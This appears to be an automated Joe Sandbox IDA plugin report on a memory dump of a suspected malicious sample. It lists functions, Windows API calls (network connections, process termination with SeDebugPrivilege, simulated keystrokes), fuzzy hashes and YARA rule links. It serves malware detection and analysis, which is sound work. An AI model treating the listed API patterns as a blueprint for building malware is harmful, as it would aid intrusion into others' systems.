ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 013068D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 013068F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,012C8874,00000000,00000000,00000000,000000FF,00000000), ref: 01306901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0130691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,012C8874,00000000,00000000,00000000,000000FF,00000000), ref: 0130692D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 7e63e5aa932fa6ff35d1b90d824feb4164e94ba60d2a5cdc7f8abadb0cc4a087
Instruction ID: 45452af628136d3cb2d728510ab1d39da55f15b7f5286970d5b575be4e53e047
Opcode Fuzzy Hash: 7e63e5aa932fa6ff35d1b90d824feb4164e94ba60d2a5cdc7f8abadb0cc4a087
Instruction Fuzzy Hash: 4E517BB4610206EFDB21CF28C856BAA7BB5FB44B54F00861CFA56D72D0EB70E991CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0132C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0132C182
GetLastError.KERNEL32 ref: 0132C195
SetEvent.KERNEL32(?), ref: 0132C1A9

Part of subcall function 0132C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0132C272
Part of subcall function 0132C253: GetLastError.KERNEL32 ref: 0132C322
Part of subcall function 0132C253: SetEvent.KERNEL32(?), ref: 0132C336
Part of subcall function 0132C253: InternetCloseHandle.WININET(00000000), ref: 0132C341

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 1c94df70e289a5bc41356403f82ae90af5f1616f83c351c038f0d4ccccc8a3ed
Instruction ID: 6e6b04ab8997775a3009d5ca48ae6168fa5abd14de6fd7c3c7ffe77232d1a8fb
Opcode Fuzzy Hash: 1c94df70e289a5bc41356403f82ae90af5f1616f83c351c038f0d4ccccc8a3ed
Instruction Fuzzy Hash: B1318E75201715AFDB31AFA9D844A6ABFFCFF19304B04641DF95A83614DB31E414DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 013125A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 01313A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01313A57
Part of subcall function 01313A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,013125B3), ref: 01313A5E
Part of subcall function 01313A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 01313A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 013125BD
PostMessageW.USER32 ref: 013125DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 013125DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 013125E9
PostMessageW.USER32 ref: 01312601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 01312605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0131260F
PostMessageW.USER32 ref: 01312623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 01312627

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 436cc3c875d826fb91febfef8f2d32323b626ed43d87343f8f2fbb1b65d4919a
Instruction ID: da44d7baf005d3a99e34cfb68e9e526e8cddd5887169f33902d3498fe905481d
Opcode Fuzzy Hash: 436cc3c875d826fb91febfef8f2d32323b626ed43d87343f8f2fbb1b65d4919a
Instruction Fuzzy Hash: 2501D831791214BBFB2066689C8AF597F5DDB4EB25F101001F318AE0C8CDE134448BAA

Uniqueness

Uniqueness Score: -1.00%

Function 01311803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,01311449,?,?,00000000), ref: 0131180C
HeapAlloc.KERNEL32(00000000,?,01311449,?,?,00000000), ref: 01311813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01311449,?,?,00000000), ref: 01311828
GetCurrentProcess.KERNEL32(?,00000000,?,01311449,?,?,00000000), ref: 01311830
DuplicateHandle.KERNEL32 ref: 01311833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01311449,?,?,00000000), ref: 01311843
GetCurrentProcess.KERNEL32(01311449,00000000,?,01311449,?,?,00000000), ref: 0131184B
DuplicateHandle.KERNEL32 ref: 0131184E
CreateThread.KERNEL32(00000000,00000000,01311874,00000000,00000000,00000000), ref: 01311868

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 0c5240991d60ee0f848b6f24d15718c42581cefc48e17c5432624bc8cf08f6ae
Instruction ID: ab3aebb538be5fb5a0ddb277e40027324830ba89f8a1954f8b221d6e2751b3f1
Opcode Fuzzy Hash: 0c5240991d60ee0f848b6f24d15718c42581cefc48e17c5432624bc8cf08f6ae
Instruction Fuzzy Hash: 4C01BBB9241308BFE720ABB5DC4DF6B3BACEB89B11F005411FA05DB295CA74A800CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0133A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0131D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0131D501
Part of subcall function 0131D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0131D50F
Part of subcall function 0131D4DC: CloseHandle.KERNEL32(00000000), ref: 0131D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0133A16D
GetLastError.KERNEL32 ref: 0133A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0133A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0133A268
GetLastError.KERNEL32(00000000), ref: 0133A273
CloseHandle.KERNEL32(00000000), ref: 0133A2C4

Strings

SeDebugPrivilege, xrefs: 0133A18F

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: bf59c6a409178cbc38fc1f6aaa60ae2caeb634d5d13318c1af6c261a26102374
Instruction ID: 5906d1a46c2ce7103890e955cce510b806492b5a582b370b63f50e81c86280d0
Opcode Fuzzy Hash: bf59c6a409178cbc38fc1f6aaa60ae2caeb634d5d13318c1af6c261a26102374
Instruction Fuzzy Hash: 6061A0342042429FE720DF18C4D4F65BBE4AF9435CF18848CE5A6CBBA2C776E945CB95

Uniqueness

Uniqueness Score: -1.00%

Function 01343886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01343925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0134393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01343954
_wcslen.LIBCMT ref: 01343999
SendMessageW.USER32(?,00001057,00000000,?), ref: 013439C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 013439F4

Strings

SysListView32, xrefs: 013438F7

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 67467f2ff1b838d1ec78aa036f10e10f6638a336fb08746bada5f0b291c75372
Instruction ID: 8b7bbb9ceb17238b07edcf474d03d3a16b9da98dd86e9d72cb3fcb7fee772a21
Opcode Fuzzy Hash: 67467f2ff1b838d1ec78aa036f10e10f6638a336fb08746bada5f0b291c75372
Instruction Fuzzy Hash: F941B771A00319ABEF219F64CC45FEABBE9FF08354F100526F954E7281D775A984CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013481DB Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000), ref: 0134824C
EnableWindow.USER32(00000000,00000000), ref: 01348272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 013482D1
ShowWindow.USER32(00000000,00000004), ref: 013482E5
EnableWindow.USER32(00000000,00000001), ref: 0134830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0134832F

Strings

8lr, xrefs: 01348206, 01348252, 01348299, 013482D7, 013482EB

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID: 8lr
API String ID: 642888154-2725927297
Opcode ID: 3f45f42aa2137bdff4b9a276dc340a843b42e8016ea1c1e1b1a5814470e09518
Instruction ID: 1af376ac248a89dd3ea32ea8dcbe892839b79278bcd97388f7af440422f5595a
Opcode Fuzzy Hash: 3f45f42aa2137bdff4b9a276dc340a843b42e8016ea1c1e1b1a5814470e09518
Instruction Fuzzy Hash: 3B418534601644AFDB22CF69C889BE87FF5FB4A718F1852E9E6184B263C731B841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0131C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32 ref: 0131C913

Strings

info, xrefs: 0131C8B4
warning, xrefs: 0131C8FC
blank, xrefs: 0131C895
stop, xrefs: 0131C8E4
question, xrefs: 0131C8CC

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 54cbc10b608118d1bacadedaa65f8c92ba79797ea76fc3d0d8e632111a7b98fa
Instruction ID: e896712bc27bb2a50fc5ef0c8990ca2e5811bd5893d4b5ecce4d92f121676128
Opcode Fuzzy Hash: 54cbc10b608118d1bacadedaa65f8c92ba79797ea76fc3d0d8e632111a7b98fa
Instruction Fuzzy Hash: F7116D716C974BBAF719AB18DCD3CAE679CCF1536CB10202EF900AA282E7746D004265

Uniqueness

Uniqueness Score: -1.00%

Function 0131ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0131ED2A
_wcslen.LIBCMT ref: 0131ED3B
_wcslen.LIBCMT ref: 0131ED79
_wcslen.LIBCMT ref: 0131EDAF
_wcslen.LIBCMT ref: 0131EDDF
_wcslen.LIBCMT ref: 0131EDEF
_wcslen.LIBCMT ref: 0131EE2B
_wcslen.LIBCMT ref: 0131EE5A

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 6bd7282f747e89844fd2d5b1aa5ebff394fda85bdcbe27a4f5548ac468662c94
Instruction ID: e22f60920fb2f3ad435ba87b3c1e6fd3626a118e48376e4e82e2d1c7ff57b4c1
Opcode Fuzzy Hash: 6bd7282f747e89844fd2d5b1aa5ebff394fda85bdcbe27a4f5548ac468662c94
Instruction Fuzzy Hash: 1141D365C2025976CB11FBF4CC899DFB7ACAF55210F408462EA18E3161FB34E255C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 012CF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF), ref: 012CF953
ShowWindow.USER32(FFFFFFFF,00000006), ref: 0130F3D1
ShowWindow.USER32(FFFFFFFF,000000FF), ref: 0130F454

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 52817c9bc2a9d3debf8511ef1c28fd17a04204cdacf73860f0bac0b2a6d3d487
Instruction ID: 3814ac547b363b187398d77d259413b71163bbda5c51b88cd49e4e5839f9866e
Opcode Fuzzy Hash: 52817c9bc2a9d3debf8511ef1c28fd17a04204cdacf73860f0bac0b2a6d3d487
Instruction Fuzzy Hash: B8414E30234781BFDF7A8B2DC6987AA7FDBAF46B18F04560CE74756590C675A080C711

Uniqueness

Uniqueness Score: -1.00%

Function 01342D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 01342D1B
GetDC.USER32(00000000), ref: 01342D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 01342D2E
ReleaseDC.USER32(00000000,00000000), ref: 01342D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01342D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01342D87
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 01342DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 01342DE1

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 5695d7c8526163e4bcbd5f9845052ccc06635ef1dd8b4602db415fb72b013dfb
Instruction ID: 8f72826d7557cd30a4d1e54434b2c5e5b5a7bc558d440a521e928dda1bd3c363
Opcode Fuzzy Hash: 5695d7c8526163e4bcbd5f9845052ccc06635ef1dd8b4602db415fb72b013dfb
Instruction Fuzzy Hash: 6731A0762026147FEB218F54DC89FEB3FADEF0A715F044055FE48AA291CA75A840CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01315622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 01315637
_memcmp.LIBVCRUNTIME ref: 01315659
_memcmp.LIBVCRUNTIME ref: 01315671
_memcmp.LIBVCRUNTIME ref: 01315684
_memcmp.LIBVCRUNTIME ref: 0131569E
_memcmp.LIBVCRUNTIME ref: 013156B1
_memcmp.LIBVCRUNTIME ref: 013156C9
_memcmp.LIBVCRUNTIME ref: 013156E4

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: bab0049cd291bd49268a70b123d78375fd0ca9c00e960c8f2e14bb054a712d1a
Instruction ID: 9241208afaa24866df6ee3e4b479295835f9aa5a61145a500ad824a6aad1d960
Opcode Fuzzy Hash: bab0049cd291bd49268a70b123d78375fd0ca9c00e960c8f2e14bb054a712d1a
Instruction Fuzzy Hash: E221CC61651106BBE61C5719AD81FFA339CAFA30ADF040414FD045AA49FB60FD2085E5

Uniqueness

Uniqueness Score: -1.00%

Function 01334FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 01335007
NULL Pointer assignment, xrefs: 0133502E, 01335383

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 9079c09e377fe6eefe08ddd42a979dcff4feee595cdb43a58904c852e6d58cf5
Instruction ID: 248be89081bbc0e47ee15ae74397957368b6467f9d2e6db263f9e2051ce79b3e
Opcode Fuzzy Hash: 9079c09e377fe6eefe08ddd42a979dcff4feee595cdb43a58904c852e6d58cf5
Instruction Fuzzy Hash: 0BD18375A0020A9FDF14CF98C880BAEB7B5FF88318F148569E915EB281D771D945CB94

Uniqueness

Uniqueness Score: -1.00%

Function 012F1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,012F17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 012F15CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,012F17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 012F1651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,012F17FB,?,012F17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 012F16E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,012F17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 012F16FB

Part of subcall function 012E3820: RtlAllocateHeap.NTDLL(00000000,?,01381444,?,012CFDF5,?,?,012BA976,00000010,01381440,012B13FC,?,012B13C6,?,012B1129), ref: 012E3852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,012F17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 012F1777
__freea.LIBCMT ref: 012F17A2
__freea.LIBCMT ref: 012F17AE

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: f1fe356edf8c59cfaf6ed15a7fe327af83349c16fdfca149e920d3e7f867e54b
Instruction ID: 45cc9bbd75fffe83be5fc193ff89276f5bd02d34b70b806984667bbbdd2e4956
Opcode Fuzzy Hash: f1fe356edf8c59cfaf6ed15a7fe327af83349c16fdfca149e920d3e7f867e54b
Instruction Fuzzy Hash: FE91C371E20217DEDB248E78D885AEEFBB5AF19610F88067DEB05E7180DB35D850CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01334523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 01334648
VariantInit.OLEAUT32(?), ref: 01334749
VariantClear.OLEAUT32(?), ref: 01334753
VariantClear.OLEAUT32(?), ref: 013347B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 013345D8, 01334706, 013347BE
Incorrect Object type in FOR..IN loop, xrefs: 0133472C

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: f6062c7b0712fcde955830ed1fa9e1364225b0dd3d6e530b7b4c29fe262993b4
Instruction ID: 7c3ede40b6abeb4c58baaae9f4692f13be9538ca027132cf4ae32ee39b2a7b4d
Opcode Fuzzy Hash: f6062c7b0712fcde955830ed1fa9e1364225b0dd3d6e530b7b4c29fe262993b4
Instruction Fuzzy Hash: B991C171A00219EFDF25CFA5C888FAEBBB8EF85718F008559F515AB280D7709945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 01321187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0132125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01321284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 013212A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 013212D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0132135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 013213C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 01321430

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
